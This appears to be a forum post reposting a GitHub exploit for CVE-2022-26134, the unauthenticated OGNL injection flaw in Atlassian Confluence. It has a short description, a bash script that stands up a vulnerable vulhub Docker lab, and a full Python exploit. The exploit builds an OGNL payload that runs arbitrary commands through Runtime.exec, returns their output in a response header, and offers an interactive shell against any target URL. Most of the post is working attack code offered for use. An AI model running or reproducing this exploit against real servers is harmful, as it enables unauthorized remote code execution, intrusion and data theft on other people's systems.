Remote CVE-2022-26134 Confluence Pre-Auth RCE via OGNL Injection

[propensity]

Описание

Confluence is a web-based corporate wiki developed by Australian software company Atlassian.

On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.

GitHub - whokilleddb/CVE-2022-26134-Confluence-RCE: Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection

Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection - GitHub - whokilleddb/CVE-2022-26134-Confluence-RCE: Exploit for CVE-2022-26134: Confluence Pre-Auth Rem...

github.com

start_confluence.sh​

#!/bin/bash

# Specify Color Schemes
NONE='\033[00m'
RED='\033[01;31m'
GREEN='\033[01;32m'
YELLOW='\033[01;33m'
BLUE='\033[01;34m'
MAGENTA='\033[01;35m'
CYAN='\033[01;36m'
WHITE='\033[01;37m'
BOLD='\033[1m'
BLINK='\033[5m'
UNDERLINE='\033[4m'

# Globals
CONTAINER_ID=""
CONTAINER_IP=""

init(){
    # Set up environment before starting containers
    echo -e $BOLD$MAGENTA[+] Setting Up Environment $NONE

    #Check if program is being run as root
    if [[ $EUID -ne 0 ]]; then
        echo -e $BOLD$RED[!] This script must be run as ROOT!$NONE 1>&2
        exit -1
    fi

    # Start Docker
    echo -e "$BOLD$CYAN[i] Starting Docker"
    systemctl start docker
    if [ $? -eq 0 ]; then
        echo -e $BOLD$GREEN[+] Successfully Started Docker$NONE
    else
        echo -e $BOLD$RED[!] Failed to start Docker$NONE
        exit -2
    fi
}

fetch_compose(){
    echo -e $BOLD$YELLOW[i] Setup Guide: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134$NONE
    echo -e $BOLD$CYAN[i] Fetching Docker Compose$BLUE
    rm -rf docker-compose.yml
    wget https://raw.githubusercontent.com/vulhub/vulhub/master/confluence/CVE-2022-26134/docker-compose.yml
}

setup(){
    echo -e $BOLD$MAGENTA[i] Stopping Containers If Any$NONE
    DOCKER_BUILDKIT=1 docker-compose down -v
    echo -e $BLUE$BLUE[i] Building Images$NONE
    DOCKER_BUILDKIT=1 docker-compose build
    echo -e $BOLD$GREEN[+] Starting containers$NONE
    DOCKER_BUILDKIT=1 docker-compose up -d
}

setup_confluence(){
    CONTAINER_ID=$(docker ps | grep 'conflu' | cut -d ' ' -f1)
    docker exec -it $CONTAINER_ID sh -c "mkdir /home/confluence"
    docker exec -it $CONTAINER_ID sh -c "chown -R confluence:confluence /home/confluence"
    docker exec -it $CONTAINER_ID sh -c "apt update -y && apt install -y netcat"
}

main() {
    init
    fetch_compose
    setup
    setup_confluence

    echo -e $BOLD$GREEN[+] Done!$NONE
}

main

confluence-exploit.py​

#!/usr/bin/env python3
import sys
import urllib3
import requests
import argparse
from requests.exceptions import InvalidSchema
from rich import print
from rich.prompt import Prompt
from urllib.parse import quote


# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Save options in a global dict
opt = dict()


def gen_payload(cmd: str):
    """Generate Payload for RCE"""

    payload = '${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("' + cmd + '").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}'
    payload = quote(payload)
    return payload


def check_args(cmd_args):
    """Check command line arguments for any sort of funny business"""

    # Start with checking the URL
    try:
        resp = requests.get(cmd_args.url, verify=False)
        if resp.ok:
            opt['url'] = cmd_args.url
        else:
            raise resp.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(":x:", f"[bold][red]Exception occured as:[/bold][/red] {e}", file = sys.stderr)
        sys.exit(-1)

    #Just print the arguments after parsing
    print(":link:", f"[bold]URL:[/bold] {opt['url']}")


def run_cmd(cmd):
    payload = gen_payload(cmd)
    url = opt['url'] + '/' + payload + '/'
    try:
        resp = requests.get(url, timeout=5, verify=False, allow_redirects=False)
        if 'X-Cmd-Response' not in resp.headers:
            print(":x:", "Could not find the Response Headers", file = sys.stderr)
            return 0
        print(resp.headers['X-Cmd-Response'])
        return 1
    except requests.exceptions.RequestException:
        print(":x:", "Request failed :(", file = sys.stderr)
        return -1


def start_prompt():
    """Start An Interactive Prompt"""
    try:
        while True:
            cmd = Prompt.ask(":point_right:", default="id")
            if (cmd.lower() == "quit" or cmd.lower() == "exit"):
                sys.exit(0)
            run_cmd(cmd)
    except KeyboardInterrupt:
        print()
        print(":x:", "[bold][red]Exiting![/red][/bold]")
        sys.exit(0)


def main():
    """Main Function"""

    parser = argparse.ArgumentParser(description="[+] Confluence Pre-Auth Remote Code Execution via OGNL Injection Exploit")
    parser.add_argument('-u', '--url', required=True,
                        help = "Base URL")
    check_args(parser.parse_args())

    start_prompt()


if __name__ == '__main__':
    main()